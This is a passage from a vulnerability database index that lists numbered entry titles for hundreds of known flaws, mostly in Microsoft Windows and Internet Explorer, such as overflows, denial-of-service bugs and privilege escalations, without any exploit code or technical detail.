Coordinator (DTC) Memory Modification Remote Code Execution [18824] Microsoft Windows Unspecified Remote Code Execution (EEYEB-20050627) [18823] Microsoft Windows Kernel APC Queue Manipulation Local Privilege Escalation [18821] Microsoft Windows Unspecified Remote Code Execution (EEYEB-20050505) [18820] Microsoft Windows GDI EMF/WMF Metafile Processing Multiple Overflows [18730] Microsoft Windows XP SP1 Raw IP Empty Datagram DoS [18729] Microsoft Windows SNMP LAN Manager (LANMAN) MIB Extension GET/NEXT Request DoS [18728] Microsoft Windows QueryIpMatching Weakness DNS Cache Poisoning [18681] Microsoft Windows XP User Account Manager Hidden User [18624] Microsoft Windows Remote Desktop Protocol (RDP) Crafted Packet Remote DoS [18609] Microsoft Windows Kerberos PKINIT Domain Controller Spoofing [18608] Microsoft Windows Kerberos Crafted Packet Remote DoS [18607] Microsoft Windows Print Spooler Service Remote Overflow [18606] Microsoft Windows Telephony Application Programming Interface (TAPI) Overflow [18605] Microsoft Windows Plug-and-Play Service Remote Overflow [18545] Microsoft Windows NT Cenroll ActiveX (xenroll.dll) File Creation Saturation DoS [18493] Microsoft Windows USB Device Driver Overflow [17885] Microsoft Windows Network Connections Service netman.dll Remote DoS [17860] Microsoft Windows NULL Session MSRPC Interface Remote eventlog Disclosure [17859] Microsoft Windows NULL Session svcctl MSRPC Interface SCM Service Enumeration [17830] Microsoft Windows Color Management Module ICC Profile Format Tag Remote Overflow [17434] Microsoft Windows ASN.1 BERDecBitString Function Overflow [17309] Microsoft Windows Web Client Request Processing Remote Code Execution [17308] Microsoft Windows Server Message Block (SMB) Remote Code Execution [17305] Microsoft Windows HTML Help (CHM) File Overflow [17304] Microsoft Windows Interactive Training .cbo File User Field Overflow [17131] Microsoft Windows Remote Desktop Protocol (RDP) Private Key Disclosure [16494] Microsoft Windows Media Player WMDRM License Acquisition Page Redirection [16430] Microsoft Windows Animated Cursor (ANI) Capability AnimationHeaderBlock Length Field Overflow [15981] Microsoft Windows XP helpctr.exe Crafted URL Command Execution [15739] Microsoft Windows Malformed Image Rendering DoS [15707] Microsoft Windows Explorer Web View Arbitrary Script Insertion [15469] Microsoft Windows MSHTA Shell Application Association Arbitrary Remote Script Execution [15463] Microsoft Windows IP Validation Failure Remote Code Execution [15462] Microsoft Windows CSRSS Local Overflow [15461] Microsoft Windows Object Management Malformed Request DoS [15460] Microsoft Windows Kernel Access Request Local Privilege Escalation [15459] Microsoft Windows Font Processing Local Privilege Escalation [15458] Microsoft Windows Message Queuing Remote Overflow [15379] Microsoft Windows ActiveDirectory LDAP Authentication Bypass [15363] Microsoft Windows Explorer.exe Malformed .wmf Processing DoS [15343] Microsoft Windows Server 2003 Malformed HTTP Cookie Header CGI DoS [15341] Microsoft Windows Server 2003 SMB Redirector Processing DoS [15340] Microsoft Windows Server 2003 Terminal Service Client Print DoS [15339] Microsoft Windows Server Atmf.dll Adobe Font Unloading DoS [15338] Microsoft Windows Server 2003 Terminal Session Close DoS [15337] Microsoft Windows Server 2003 CreateProcessWithLogonW() Function Process Disclosure [15336] Microsoft Windows Server 2003 Shutdown.exe Shut Down Failure [15335] Microsoft Windows Server 2003 MIT Kerberos Realm Authentication Group Policy Failure [15334] Microsoft Windows Server 2003 Shared Folder Permission Weakness [15333] Microsoft Windows Server 2003 EFS File Copy LDAP Connection DoS [15332] Microsoft Windows Server 2003 Citrix Metaframe Encryption Policy Failure [15331] Microsoft Windows Server 2003 Home Folder Path Permission Inheritance Failure [15215] Microsoft Windows SMTP E-mail Malformed Time Stamp DoS [15171] Microsoft Windows XP Search Function Arbitrary XML Injection [15075] Microsoft Windows wab32.dll Malformed .wab File DoS [15011] Microsoft Windows Remote Desktop TSShutdn.exe Unauthenticated Shutdown DoS [14862] Microsoft Windows GDI32.DLL GetEnhMetaFilePaletteEntries() API EMF File DoS [14741] Microsoft Windows XP CommCtl32.dll Shatter Code Execution [14578] Microsoft Windows Malformed TCP SYN Loopback Packet Remote DoS (land) [14475] Microsoft Windows Script Engine for Jscript JsArrayFunctionHeapSort Overflow [14399] Microsoft Windows Media Player .wmf Detection Auto-Run Weakness [14182] Microsoft Windows Drive Restriction Group Policy Bypass [14118] Microsoft Windows Malformed ARP Packet Saturation DoS [13996] Microsoft Windows 2000 IKE Malformed Packet Saturation Remote DoS [13987] Microsoft Windows XP Help Center helpctr.exe Long hcp: URL Overflow [13959] Microsoft Windows Universal Plug and Play (UPnP) Malformed Request DoS [13609] Microsoft Windows Hyperlink Object Library Overflow [13602] Microsoft Windows OLE Input Validation Overflow [13601] Microsoft Windows COM Structured Storage Privilege Escalation [13600] Microsoft Windows SMB Transaction Data Overflow [13599] Microsoft Windows License Logging Service Overflow [13597] Microsoft Windows Media Player PNG File Overflow [13596] Microsoft Windows XP Named Pipe Username Disclosure [13595] Microsoft Windows Sharepoint Services HTML Redirection XSS [13577] Microsoft Windows NetBIOS Remote Host Information Disclosure [13481] Microsoft Windows NT OffloadModExpo CryptographyOffload Registry Key Permission Weakness [13480] Microsoft Windows NT MTS Package Administration Registry Key Permission Weakness [13477] Microsoft Windows Java Applet UDP Socket Exhaustion DoS [13476] Microsoft Windows Media Player asx Parser Multiple Tag Overflow [13475] Microsoft Windows 2000 Telnet Service Predictable Named Pipe Arbitrary Command Execution Variant [13474] Microsoft Windows 2000 Telnet Service Predictable Named Pipe Arbitrary Command Execution [13441] Microsoft Windows 2000 Security Interface Change Password Option Account Enumeration [13440] Microsoft Windows XP Hot Keys Screen Lock Bypass [13438] Microsoft Windows CONVERT.EXE FAT32 File Permission Conversion Failure [13437] Microsoft Windows 2000 Debug Register Local Privilege Escalation [13435] Microsoft Windows XP Port 445 Malformed SYN Packet DoS [13434] Microsoft Windows Distributed Transaction Coordinator (DTC) Malformed Input DoS [13424] Microsoft Windows 2000 Current Password Change Policy Bypass [13423] Microsoft Windows 2000 Terminal Server SYSVOL Share Connection Saturation Restriction Bypass [13422] Microsoft Windows PPTP Service Malformed Control Data Overflow [13421] Microsoft Windows XP RDP Malformed PDU Confirm Active Packet DoS [13420] Microsoft Windows NTFS Hard Link Audit Bypass [13419] Microsoft Windows Media Player Active Playlist Arbitrary HTML Script Execution [13416] Microsoft Windows NetDDE Agent WM_COPYDATA Message Arbitrary Code Execution (shatter) [13415] Microsoft Windows 2000 System Root Folder Search Path Permission Weakness [13414] Microsoft Windows RPC Endpoint Manager Malformed Packet Remote DoS [13413] Microsoft Windows XP Windows Shell Function .mp3/.wma Custom Attribute Overflow [13411] Microsoft Windows XP Redirector Function Long Parameter Overflow [13410] Microsoft Windows 2000 Accessibility Utility Manager Arbitrary Code Execution [13409] Microsoft Windows XP EXPLORER.EXE desktop.ini .ShellClassInfo Parameter Overflow [13408] Microsoft Windows SHELL32.DLL ShellExecute API Function Overflow [13389] Microsoft Windows DirectX QUARTZ.DLL Multiple Field .mid File Overflows [13330] Microsoft Windows HKLM Registry Key Locking DoS [13020] Microsoft Windows XP RPC Cache Memory Leak [12842] Microsoft Windows Cursor and Icon Validation Code Execution [12840] Microsoft Windows HTML Help Related Topics Arbitrary Command Execution [12832] Microsoft Windows Indexing Service Query Overflow [12655] Microsoft Windows Active Directory LSASS.EXE DoS [12625] Microsoft Windows winhlp32.exe Overflow [12624] Microsoft Windows Kernel ANI File Parsing DoS [12623] Microsoft Windows LoadImage API Overflow [12511] Microsoft Windows Media Player ActiveX Control setItemInfo() / getItemInfo() Arbitrary WMA File Manipulation [12510] Microsoft Windows Media Player ActiveX Control getItemInfoByAtom() Function File Information Disclosure [12507] Microsoft Windows XP SP2 Popup Blocker Bypass [12482] Microsoft Windows XP Dial-Up Access Firewall Disable [12378] Microsoft Windows WINS Association Context Validation Remote Code Execution [12377] Microsoft Windows NT DHCP Message Length Remote Overflow [12376] Microsoft Windows LSASS Identity Token Validation Local Privilege Escalation [12374] Microsoft Windows HyperTerminal Session File Remote Overflow [12372] Microsoft Windows Kernel Application Launch Local Privilege Escalation [12371] Microsoft Windows NT Malformed DHCP Packet Remote Overflow DoS [12370] Microsoft Windows WINS Computer Name Validation Remote Code Execution [12123] Microsoft Windows ipconfig.exe Overflow [12001] Microsoft Windows XP SP2 File Download Warning Bypass [12000] Microsoft Windows XP SP2 Unspecified Local Zone Access [11999] Microsoft Windows XP SP2 Unspecified Remote File Access [11936] Microsoft Windows shlwapi.dll Malformed HTML Tag Handling Null Pointer DoS [11917] Microsoft Windows XP SP2 Spoofed Content-Location Warning Bypass [11801] Microsoft Windows Small Buffer Length SMB Packet Overflow [11799] Microsoft Windows SMB Signing Group Policy Modification [11797] Microsoft Windows DCOM RPCSS Service DCERPC Packet Overflow [11750] Microsoft Windows 2000 Message Queue Manager Queue Registration Request Overflow DoS [11479] Microsoft Windows NT Double Dot Samba Client DoS [11478] Microsoft Windows NT Malformed SMB Logon Request DoS [11477] Microsoft Windows NT LSASS.EXE Access Violation DoS [11476] Microsoft Windows NT DebugActiveProcess Function Privilege Escalation [11475] Microsoft Windows NT NtOpenProcessToken Permission Failure [11474] Microsoft Windows NT CSRSS Thread Exhaustion DoS [11473] Microsoft Windows NT Messenger Service Long Username DoS [11472] Microsoft Windows NT DNS Server Malformed Response DoS [11471] Microsoft Windows NT DNS Server Character Saturation DoS [11470] Microsoft Windows NT Help File Utility Overflow [11469] Microsoft Windows NT Malformed File Image Header DoS [11468] Microsoft Windows NT IOCTL Function DoS [11463] Microsoft Windows Authenticode ActiveX Install Failure Remote Code Execution [11462] Microsoft Windows HSC PCHealth System HCP URL Query Overflow [11461] Microsoft Windows Workstation Service WKSSVC.DLL Logging Function Remote Overflow [11460] Microsoft Windows RPC DCOM Interface epmapper Pipe Hijack Local Privilege Escalation [11453] Microsoft Windows 98 Malformed oshare Packet DoS [11265] Microsoft Windows NT Malformed RPC Packet Error Message Loop DoS (snork) [11264] Microsoft Windows NT SCM Malformed Resource Enumeration Request DoS [11259] Microsoft Windows NT Domain User Login System Policy Download Failure [11162] Microsoft Windows 95 .pwl File Weak Password Encryption [11161] Microsoft Windows 95 NetWare Remote Administration Hidden File Share [11159] Microsoft Windows NT Invalid RPC Named Pipe Saturation DoS [11158] Microsoft Windows NT Malformed Token Ring DoS [11156] Microsoft Windows NT tcpip.sys Malformed ICMP Request DoS [11096] Microsoft Windows ntconfig.pol Write Failure Access Restriction Bypass [11095] Microsoft Windows NT Ntconfig.pol Long Server Name Access Restriction Bypass [11094] Microsoft Windows NT User Mode Application Handle Closing DoS [11053] Microsoft Windows XP Explorer WAV Parsing DoS [11011] Microsoft Windows NT Netbt.sys Malformed DNS Response DoS [10999] Microsoft Windows Troubleshooter ActiveX Control Tshoot.ocx Arbitrary Code Execution [10997] Microsoft Windows Media Player ActiveX Control Unauthorized Media Library Manipulation [10975] Microsoft Windows NT Winpopup Long Username DoS [10938] Microsoft Windows User32.dll ComboBox CB_DIR Message Local Overflow [10937] Microsoft Windows User32.dll ListBox LB_DIR Message Local Overflow [10936] Microsoft Windows Messenger Service Message Length Remote Overflow [10908] Microsoft Windows XP SP2 ZIP Wizard ZoneID Tracking Failure [10854] Microsoft Windows XP Zip Manager zipfldr.dll Overflow DoS [10699] Microsoft Windows Program Group Converter Arbitrary Code Execution [10698] Microsoft Windows Shell Application Start Arbitrary Code Execution [10697] Microsoft Windows/Exchange NNTP Component Remote Overflow [10696] Microsoft Windows/Exchange SMTP DNS Lookup Overflow [10695] Microsoft Windows Compressed Folders DUNZIP32.DLL File Handling Overflow [10693] Microsoft Windows Unspecified Kernel Local DoS [10692] Microsoft Windows Metafile Image Format Arbitrary Code Execution [10691] Microsoft Windows Virtual DOS Machine Subsystem Local Privilege Escalation [10690] Microsoft Windows Management APIs Local Privilege Escalation [10689] Microsoft Windows NetDDE Remote Overflow [10688] Microsoft Windows WebDAV XML Message Handler Malformed Request DoS [10686] Microsoft Windows NT RPC Library Arbitrary Memory Manipulation [10648] Microsoft Windows NT Default SNMP Registry Key Permission Weakness Local Privilege Escalation [10647] Microsoft Windows CIFS Browser Protocol Arbitrary NetBIOS Cache Entry Modification [10634] Microsoft Windows 95/98 Spoofed ARP Packet Cache Manipulation [10633] Microsoft Windows 2000 Protected Store Weak Encryption Default [10618] Microsoft Windows NT autorun.inf Arbitrary Command Execution [10616] Microsoft Windows NT Fragmented IP Packet Firewall Restriction Bypass [10615] Microsoft Windows NT linux smbmount Request DoS [10614] Microsoft Windows NT %systemroot% Path Inclusion [10609] Microsoft Windows WINS Malformed Packet Consumption DoS [10608] Microsoft Windows TCP/IP Last Sequence Forced RST DoS [10607] Microsoft Windows ICMP Redirect Spoofing DoS [10606] Microsoft Windows LSA NULL Policy Handle DoS [10604] Microsoft Windows NT PATH Working Directory Inclusion [10456] Microsoft Windows IPv6 Packet Fragmentation Handling DoS [10247] Microsoft Windows SMTP Service NTLM Null Session Mail Relay [10230] Microsoft Windows XP SP2 File/Print Share Restriction Bypass [9722] Microsoft Windows NT System Critical Registry Key Contain Bad Value [9579] Microsoft Windows NT GetThreadContext/SetThreadContext Kernel Mode Address DoS [9530] Microsoft Windows CRL File Digital Signature Verification Failure [9386] Microsoft Windows 2000 msinfo32.exe msinfo_file Variable Overflow [9359] Microsoft Windows Page File pagefile.sys Information Disclosure [9358] Microsoft Windows NT Event Log Inappropriate Permissions [9356] Microsoft Windows NT HKEY_CLASSES_ROOT Key Inappropriate System-Critical Permissions [9355] Microsoft Windows NT HKEY_LOCAL_MACHINE Key Inappropriate System-Critical Permissions [9349] Microsoft Windows NT Systems User Audit Policy Logging Weakness [9348] Microsoft Windows NT Non-NTFS File System Insecure [9152] Microsoft Windows XP SP2 Zone Identifier Object Value Warning Failure [9141] Microsoft Windows File Icon Spoofing [9140] Microsoft Windows XP Content-Location Local Computer Zone Bypass [9012] Microsoft Windows XP Internet Connection Firewall Bypass [8368] Microsoft Windows XP/2003 Login Screen Consumption DoS [8334] Microsoft Windows NT \?? Object Folder Symlink Privilege Escalation [8161] Microsoft Windows NT Invalid User Privileges [8160] Microsoft Windows NT File/Directory Invalid Permissions [8112] Microsoft Windows NT Weak Account Password Policy [8051] Microsoft Windows Networking Software Long Filename Handling Arbitrary Command Execution [7904] Microsoft Windows Media Player ActiveX File Existence Disclosure [7891] Microsoft Windows IE window.moveBy Function Pointer Hijack (HijackClickV2) [7855] Microsoft IE on Windows ME Javascript Cookie Set Bypass [7804] Microsoft Windows HTML Help Arbitrary Code Execution [7803] Microsoft Windows showHelp Arbitrary Code Execution [7800] Microsoft Windows POSIX Subsystem Privilege Escalation [7798] Microsoft Windows Task Scheduler Remote Overflow [7777] Microsoft Windows Media Control Preview Script Execution [7738] Microsoft Windows Media Player Skins File Arbitrary Command Execution [7576] Microsoft Windows NT RSHSVC .Rhosts Unauthorized Access [7182] Microsoft Windows Media Unicast Service Severed Connection Memory Leak DoS [7179] Microsoft Windows 2000 Event Viewer Snap-in Overflow [7178] Microsoft Windows Media Player WMP ActiveX Control Javascript Command Execution [7117] Microsoft Windows RPC Locator Remote Overflow [6790] Microsoft Windows NT AEDebug Registry Key Weak Permissions [6515] Microsoft Windows 2000 Domain Expired Account Authentication [6221] Microsoft Windows XP desktop.ini CLSID Arbitrary Command Execution [6074] Microsoft Windows Me HSC hcp:// URL XSS [6053] Microsoft Windows Help and Support Center HCP URL Code Execution [5968] Microsoft Windows ARP Packet DoS [5966] Microsoft Windows NT SMB Traversal Arbitrary File Access [5858] Microsoft Windows NT Rshsvc.exe Arbitrary Command Execution [5687] Microsoft Windows IE and Explorer Share Name Overflow [5686] Microsoft Windows Telnet Service Account Information Disclosure [5558] Microsoft Windows Media Player Advanced Streaming Format Overflow [5313] Microsoft Windows Media Device Manager Invalid Local Storage Device Privilege Escalation [5312] Microsoft Windows Media Player .wma IE Cache Arbitrary Code Execution [5261] Microsoft Windows ASN.1 Double Free Code Execution [5260] Microsoft Windows SSL Library Malformed Message Remote DoS [5259] Microsoft Windows Negotiate SSP Code Execution [5258] Microsoft Windows Virtual DOS Machine Privilege Escalation [5257] Microsoft Windows Local Descriptor Table Privilege Escalation [5256] Microsoft Windows Unspecified H.323 Code Execution [5255] Microsoft Windows Management Privilege Escalation [5254] Microsoft Windows Utility Manager Privilege Escalation [5253] Microsoft Windows Help and Support Center Command Execution [5252] Microsoft Windows Metafile Code Execution [5251] Microsoft Windows Winlogon Command Execution [5250] Microsoft Windows SSL Library Private Communications Transport (PCT) Remote Overflow [5249] Microsoft Windows LDAP Crafted Request Remote DoS [5248] Microsoft Windows LSASS Remote Overflow [5247] Microsoft Windows DCOM RPC Object Identity Information Disclosure [5246] Microsoft Windows CIS/RPC Over HTTP DoS [5245] Microsoft Windows RPCSS Large Length Field DoS [5179] Microsoft Windows 2000 microsoft-ds DoS [4877] Microsoft Windows Terminal Services Kerberos Double Authorization Data Entry [4467] Microsoft Windows WebDav ntdll.dll Remote Overflow [4170] Microsoft Windows 2000 Server Media Services TCP Packet Handling Remote DoS [3903] Microsoft Windows WINS Server Remote Overflow [3902] Microsoft Windows ASN.1 Library Integer Overflow [3711] Microsoft Windows XP Malicious Folder Automatic Code Execution [3111] Microsoft IE Windows Scripting Host (WSH) GetObject Javascript Function Arbitrary File Access [3106] Microsoft Windows Password Authentication Security Point of Failure [3067] Microsoft Windows Media Player ASF File Arbitrary Code Execution [2960] Microsoft Windows Messenger Service Social Engineering Weakness [2705] Microsoft Windows 2000 Windows Troubleshooter ActiveX Overflow [2692] Microsoft Windows Design Tools MDT2DD.DLL COM Object Memory Corruption Command Execution [2678] Microsoft Windows Overflow in ListBox and [2677] Microsoft Windows Arbitrary ActiveX Control Installation [2675] Microsoft Windows HCP protocol Overflow [2670] Microsoft Windows RPC Race Condition DoS [2657] Microsoft Windows Message Queuing Service Heap Overflow [2655] Microsoft Windows Server 2003 Shell Folders Arbitrary File Access [2642] Microsoft Windows Unauthorised Thread Termination [2571] Microsoft Windows TCP Packet URG Value Information Disclosure [2540] Microsoft Windows 2003 Server Buffer Overflow Protection Mechanism Bypass [2535] Microsoft Windows DCOM RPCSS Service Filename Parameter Overflow [2507] Microsoft Windows NetBIOS Random Memory Content Disclosure [2328] Microsoft Windows NT 4.0 with IBM JVM DoS [2262] Microsoft Windows Media Player DHTML Local Zone Access [2247] Microsoft Windows Media Services Remote Command Execution #2 [2244] Microsoft Windows 2000 ShellExecute() API Let [2237] Microsoft Windows 2000 Active Directory Lsass.exe Overflow [2100] Microsoft Windows RPC DCOM Interface Overflow [2074] Microsoft Windows Server Message Block (SMB) Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS [2073] Microsoft Windows XP Network Share Provider Overflow [2072] Microsoft Windows Network Connection Manager Privilege Elevation [2051] Microsoft Windows User Shell Buffer Overflow [2037] Microsoft Windows Trusted Domain SID Remote Privilege Escalation [1990] Microsoft Windows Terminal Services False IP Address [1975] Microsoft Windows Terminal Server Service RDP Remote DoS [1928] Microsoft Windows NNTP Malformed Post DoS [1915] Microsoft Windows Media Player .NSC File Overflow [1912] Microsoft Windows Terminal Server Malformed RDP DoS [1861] Microsoft Windows Telnet Local System Call DoS [1860] Microsoft Windows Telnet Service Handle Leak DoS [1859] Microsoft Windows Telnet Multiple Sessions DoS [1858] Microsoft Windows Telnet Service Logon Backspace DoS [1840] Microsoft Windows Media Player Internet Shortcut Execution [1764] Microsoft Windows 2000 Domain Controller DoS [1758] Microsoft Windows 2000 Network DDE Escalated Privileges [1755] Microsoft Windows 2000 RDP Malformed Packet Handling Remote DoS [1735] Microsoft Windows NT SNMP WINS Database Deletion Remote DoS [1725] Microsoft Windows Media Player .WMZ Arbitrary Java Applet Execution [1672] Microsoft Windows 2000 Telnet Session Timeout DoS [1658] Microsoft Windows Media Player .ASX File Handling Overflow [1656] Microsoft Windows Media Player .WMS Arbitrary Script Execution [1639] Microsoft Windows NT Terminal Server RegAPI.DLL Username Overflow [1633] Microsoft Windows 2000 System Monitor ActiveX LogFileName Parameter Validation Overflow [1621] Microsoft Indexing Services for Windows 2000 .htw XSS [1607] Microsoft Windows 9x Invalid Driver Type DoS [1599] Microsoft Windows 9x / Me IPX NMPI Packet DoS [1591] Microsoft Windows 2000 OEMPreinstall Installation Permission Weakness [1578] Microsoft Windows 2000 Simplified Chinese IME Local Privilege Escalation [1571] Microsoft Windows Media Player Malformed Embedded OCX Control DoS [1563] Microsoft Windows / Office DLL Search Path Weakness [1546] Microsoft Windows Media Unicast Service Malformed Request DoS [1491] Microsoft Windows 9x IPX Ping Packet DoS [1437] Microsoft Windows 2000 Telnet Server Binary Zero Parsing Remote DoS [1399] Microsoft Windows 2000 Windows Station Access [1358] Microsoft Windows NT HostAnnouncement DoS [1308] Microsoft Windows NetBIOS NULL Source Name DoS [1297] Microsoft Windows 2000 Active Directory Object Attribute [1292] Microsoft Windows NT 4.0 / 2000 cmd.exe Buffer Overflow [1268] Microsoft Windows TCP/IP Printing Service DoS [1257] Microsoft Windows Media License Manager DoS [1251] Microsoft Windows MS DOS Device Name DoS [1226] Microsoft Windows Media Server Malformed Handshake Sequence DoS [1214] Microsoft Windows NT Recycle Bin Deleted File Access [1199] Microsoft Windows NT NtImpersonateClientOfPort LPC Privilege Escalation [1166] Microsoft Windows NT LsaLookupSids() DoS [1161] Microsoft Windows Help System File Manipulation Local Privilege Escalation [1146] Microsoft Windows 9x Credential Cache Cleartext Password Disclosure [1135] Microsoft Windows NT Print Spooler Service (spoolss.exe) AddPrintProvider() Function Alternate Print Provider Arbitrary Command Execution [1134] Microsoft Windows NT Print Spooler Malformed Request Overflow [1095] Microsoft Windows NT RPC Locator (RPCSS.EXE) CPU Utilization DoS [1076] Microsoft Windows IP Source Routing [1075] Microsoft Windows NT RASMAN Path Subversion Privilege Escalation [1046] Microsoft Windows telnet.exe Argument Overflow [1022] Microsoft Windows Invalid IGMP Header Handling Remote DoS [1013] Microsoft Windows NT Screensaver Context Local Privilege Escalation [1010] Microsoft Windows NT Malformed LSA Request DoS [967] Microsoft Windows NT WINS Service Malformed Data DoS [945] Microsoft Windows 95/98 SMB Authentication Replay [943] Microsoft Windows NT SP4 Null NT Hash Value Share Access [931] Microsoft Windows NT GINA Arbitrary Clipboard Content Disclosure [868] Microsoft Windows Compressed Folders ZIP Decompression Arbitrary File Write [867] Microsoft Windows Compiled HTML Help (.chm) Arbitrary Command Execution [864] Microsoft Windows Certificate Enrollment ActiveX Arbitrary Certificate Deletion [858] Microsoft Windows NCM Handler Local Privilege Elevation [837] Microsoft Windows RAS Phonebook dial-up String Overflow [788] Microsoft Windows smss.exe Handle Duplication Local Privilege Escalation [773] Microsoft Windows 2000 Group Policy File Lock DoS [772] Microsoft Windows Multiple UNC Provider Request Overflow [736] Microsoft Windows SMB Enumeration Information Disclosure [732] Microsoft Windows SMTP Service Malformed BDAT Request Remote DoS [715] Microsoft Windows NT LsaQueryInformationPolicy Function NULL Session Domain SID Enumeration [714] Microsoft Windows NT LsaQueryInformationPolicy() Function SID User Account Disclosure [697] Microsoft Windows Universal Plug and Play NOTIFY DoS [692] Microsoft Windows Universal Plug and Play NOTIFY Overflow [673] Microsoft Windows NT RPC Endpoint Mapper Malformed Request DoS [665] Microsoft Windows 95 Online Registration Information Disclosure [608] Microsoft Windows IrDa Driver Malformed Packet Remote Overflow DoS [581] Microsoft Windows SMTP Incorrect Credentials Authentication Bypass [572] Microsoft Windows NT NTLMSSP Crafted LPC Request Local Privilege Escalation [515] Microsoft Windows 2000 LDAP Server Arbitrary User Password Modification [511] Microsoft Windows Malformed PPTP Packet Stream Remote DoS [499] Microsoft Windows NT Winsock2ProtocolCatalogMutex Mutex Local DoS [466] Microsoft Windows NT RAS Administration Registry Key Permission Weakness Local Privilege Escalation [454] Microsoft Windows 2000 NTLM Domain Account Lockout Policy Bypass [445] Microsoft Windows LAN Manager SNMP LanMan Information Disclosure [424] Microsoft Windows NT Malformed LPC Request Remote DoS [423] Microsoft Windows File Share Password Protection Bypass [418] Microsoft Windows telnet.exe NTLM Authentication Information Disclosure [408] Microsoft Windows Malformed DCE/RPC SMBwriteX Request DoS [403] Microsoft Windows 2000 Still Image Service WM_USER Message Local Overflow [398] Microsoft Windows 2000 Malformed RPC Traffic Local Security Policy Corruption DoS [385] Microsoft Windows Shell Executable (Explorer.exe) Registry Relative Path Privilege Escalation [336] Microsoft Windows CIFS Computer Browser ResetBrowser Frame DoS [335] Microsoft Windows Fragmented IP Packet Saturation DoS (jolt2) [334] Microsoft Windows Registry: Permission to Modify Common Paths [332] Microsoft Windows Registry Key Permission Weakness Admin Privilege Escalation [331] Microsoft Windows Remote Registry Access [316] Microsoft Windows NT Remote Registry Server WinLogon.exe Malformed Request Local DoS [304] Microsoft Windows NT service pack level via remote registry access [303] Microsoft Windows NetBIOS Null Session Remote Registry Access [300] Microsoft Windows SMB LanMan Pipe Server Listing Disclosure [299] Microsoft Windows NetBIOS Shares Access Control Weakness [297] Microsoft Windows Installation ADMIN$ Share Arbitrary Access [218] Microsoft Windows Multiple TCP/IP Stack Malformed Ping DoS [129] Microsoft Windows NT FTP 'guest' Account [96192] Microsoft IE EUC-JP Character Encoding XSS [96191] Microsoft IE Process Integrity Level Assignment Bypass [96190] Microsoft IE Unspecified Memory Corruption (2013-3199) [96189] Microsoft IE Unspecified Memory Corruption (2013-3194) [96188] Microsoft IE Unspecified Memory Corruption (2013-3193) [96187] Microsoft IE Unspecified Memory Corruption (2013-3191) [96186] Microsoft IE Unspecified Memory Corruption (2013-3190) [96185] Microsoft IE Unspecified Memory Corruption (2013-3189) [96184] Microsoft IE Unspecified Memory Corruption (2013-3188) [96183] Microsoft IE Unspecified Memory Corruption (2013-3187) [96182] Microsoft IE Unspecified Memory Corruption (2013-3184) [96181] Microsoft Active Directory Federation Services (AD FS) Open Endpoint Unspecified Account Information Disclosure [96127] National Instruments LabWindows/CVI Help Subsystem ActiveX Unspecified Issue [95886] OpenAFS for Windows afslogon.dll krb5_context Creation Failure Memory Exhaustion Remote DoS [95826] Microsoft IE jscript9.dll Recycler::ProcessMark Function Garbage Collection Object Address Information Disclosure Weakness [95687] Microsoft IE Enhanced / Protected Mode Elevation Policy Check Bypass [95617] Microsoft IE 9 Status Bar Spoofing Weakness [95569] Microsoft DirectShow Runtime quartz.dll CWAVEStream::GetMaxSampleSize() Function Multiple Sound File Handling Divide-by-Zero DoS Weakness [95377] Novell GroupWise on Windows Email Message Body Arbitrary Code Execution Weakness [95029] Google Chrome for Windows GL Texture Screen Information Disclosure [94984] Microsoft IE Shift JIS Character Encoding XSS [94983] Microsoft IE Unspecified Memory Corruption (2013-3115) [94982] Microsoft IE Unspecified Memory Corruption (2013-3164) [94981] Microsoft IE Unspecified Memory Corruption Arbitrary Code Execution (2013-3163) [94980] Microsoft IE Unspecified Memory Corruption (2013-3162) [94979] Microsoft IE Unspecified Memory Corruption (2013-3161) [94978] Microsoft IE Unspecified Memory Corruption (2013-3153) [94977] Microsoft IE Unspecified Memory Corruption (2013-3152) [94976] Microsoft IE Unspecified Memory Corruption (2013-3151) [94975] Microsoft IE Unspecified Memory Corruption (2013-3150) [94974] Microsoft IE Unspecified Memory Corruption (2013-3146) [94973] Microsoft IE Unspecified Memory Corruption (2013-3149) [94972] Microsoft IE Unspecified Memory Corruption (2013-3148) [94971] Microsoft IE Unspecified Memory Corruption (2013-3147) [94969] Microsoft IE Unspecified Memory Corruption (2013-3145) [94968] Microsoft IE Unspecified Memory Corruption (2013-3144) [94967] Microsoft IE Unspecified Memory Corruption (2013-3143) [94960] Microsoft Multiple Product TrueType Font (TTF) File Handling Arbitrary Code Execution [94959] Microsoft .NET Framework / Silverlight Multidimensional Arrays Small Structure Handling Arbitrary Code Execution [94958] Microsoft Silverlight NULL Pointer Handling Arbitrary Code Execution [94957] Microsoft .NET Framework Delegate Object Serialization Permission Validation Privilege Escalation [94956] Microsoft .NET Framework Small Structure Array Allocation Remote Code Execution [94955] Microsoft .NET Framework Anonymous Method Injection Reflection Objection Permission Validation Privilege Escalation [94954] Microsoft .NET Framework Delegate Reflection Bypass Reflection Objection Permission Validation Privilege Escalation [94507] Microsoft IE Infinite Loop DoS [94330] Microsoft Outlook S/MIME EmailAddress Attribute Mismatch Weakness [94154] IBM Informix Dynamic Server on Windows Crafted SQLIDEBUG Handling Remote DoS [94127] Microsoft Office PNG File Handling Buffer Overflow [94123] Microsoft IE Webpage Script Debugging Memory Corruption [94122] Microsoft IE Unspecified Memory Corruption (2013-3142) [94121] Microsoft IE Unspecified Memory Corruption (2013-3141) [94120] Microsoft IE Unspecified Memory Corruption (2013-3139) [94119] Microsoft IE Unspecified Memory Corruption (2013-3125) [94118] Microsoft IE Unspecified Memory Corruption (2013-3124) [94117] Microsoft IE Unspecified Memory Corruption (2013-3123) [94116] Microsoft IE Unspecified Memory Corruption (2013-3122) [94115] Microsoft IE Unspecified Memory Corruption (2013-3121) [94114] Microsoft IE Unspecified Memory Corruption (2013-3120) [94113] Microsoft IE Unspecified Memory Corruption (2013-3119) [94112] Microsoft IE Unspecified Memory Corruption (2013-3118) [94111] Microsoft IE Unspecified Memory Corruption (2013-3117) [94110] Microsoft IE Unspecified Memory Corruption (2013-3116) [94109] Microsoft IE Unspecified Memory Corruption (2013-3114) [94108] Microsoft IE Unspecified Memory Corruption (2013-3113) [94107] Microsoft IE Unspecified Memory Corruption (2013-3112) [94106] Microsoft IE Unspecified Memory Corruption (2013-3111) [94105] Microsoft IE Unspecified Memory Corruption (2013-3110) [94094] Splunk for Windows Universal Forwarder Path Subversion Local Privilege Escalation [93840] Google Chrome for Windows GetFileHandleForProcess Function ipc_platform_file.cc Handle Value Validation Issue [93723] Novell Client for Windows nwfs.sys 0x1439EB IOCTL Handling Local Integer Overflow [93718] Novell Client for Windows nicm.sys 0x143B6B IOTCL Request Handling Local Privilege Escalation [93425] Mozilla 